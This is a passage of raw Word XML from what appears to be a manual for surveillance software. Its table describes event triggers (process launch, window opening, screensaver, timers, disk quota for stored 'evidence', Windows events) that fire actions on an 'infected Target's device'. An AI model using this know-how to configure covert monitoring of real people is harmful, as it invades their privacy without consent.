                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1037" DrawAspect="Content" ObjectID="_1446455252" r:id="rId86"/>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Process</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="00446F09" w:rsidP="00446F09">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Process </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Action when a specific </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>application is launched or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> when </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">a window </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">with a specific title </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is opened on</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s </w:t>
            </w:r>
            <w:r w:rsidRPr="00446F09">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>device</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1038" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId87" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1038" DrawAspect="Content" ObjectID="_1446455253" r:id="rId88"/>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Quota</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="00DE79FD" w:rsidP="00DE79FD">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Quota </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>disk space used to store evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> exceeds </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>specified threshold</w:t>
            </w:r>
            <w:r w:rsidRPr="00DE79FD">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w: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RPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1039" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId89" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1039" DrawAspect="Content" ObjectID="_1446455254" r:id="rId90"/>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Screensaver</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="001231B5" w:rsidP="001231B5">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001231B5">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Screensaver </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="001231B5">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="001231B5">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>infected T</w:t>
            </w:r>
            <w:r w:rsidRPr="001231B5">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>arget</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>’s</w:t>
            </w:r>
            <w:r w:rsidRPr="001231B5">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> device runs the screensaver.</w:t>
            </w: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RPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1040" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId91" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1040" DrawAspect="Content" ObjectID="_1446455255" r:id="rId92"/>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Timer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="009045F2" w:rsidP="00B404C6">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009045F2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Timer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="009045F2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r w:rsidR="00B404C6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="009045F2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r w:rsidR="00B404C6">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tion at the indicated intervals and can be configured in Loop mode, Daily mode, Date mode and AfterInst mode.</w:t>
            </w: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RPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pP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Tr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1041" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId93" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1041" DrawAspect="Content" ObjectID="_1446455256" r:id="rId94"/>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Window</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="00317F8E" w:rsidP="00317F8E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317F8E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Window </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00317F8E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Action when any window is opened on the infected Target’s device.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00446F09"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446F09" w:rsidRPr="005701FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="005701FD" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE79FD" w:rsidRPr="006172B5" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="006172B5" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="006172B5" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="006172B5" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DE79FD" w:rsidTr="006172B5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1151" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="006172B5" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1042" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId95" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1042" DrawAspect="Content" ObjectID="_1446455257" r:id="rId96"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="266" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8221" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="000843EC" w:rsidP="00E14BDC">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>WinEvent</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="000843EC" w:rsidRPr="00671455" w:rsidRDefault="00317F8E" w:rsidP="00317F8E">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00317F8E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The WinEvent </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00317F8E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00317F8E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00317F8E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>operating system logs a Windows event</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00476149">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00476149" w:rsidRDefault="00476149" w:rsidP="00476149">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The image</w:t>
      </w:r>
      <w:r w:rsidR="0098176A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s below show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the pop-up window</w:t>
      </w:r>
      <w:r w:rsidR="0098176A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">s for the creation of all </w:t>
      </w:r>
      <w:r w:rsidR="000D4BBF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="0098176A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of </w:t>
      </w:r>
      <w:r w:rsidR="000E0581">
        <w:rPr>
